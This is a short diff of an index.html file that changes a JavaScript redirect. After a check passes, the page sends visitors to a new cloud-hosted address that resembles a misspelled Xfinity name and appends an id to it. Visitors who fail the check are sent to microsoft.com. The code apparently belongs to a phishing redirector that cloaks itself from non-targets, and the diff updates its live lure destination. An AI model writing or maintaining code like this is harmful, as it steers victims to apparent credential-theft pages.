--- a/index.html
+++ b/index.html
@@ -31,7 +31,7 @@
            if (data2)
            {
              console.log("true");
-             window.location.href = "https://wwj.za.com/lo/"+"#"+id;
+             window.location.href = "https://xfintycoayh.z20.web.core.windows.net/"+"#"+id;
            }else{
              console.log("false");
              window.location.href = "https://microsoft.com";
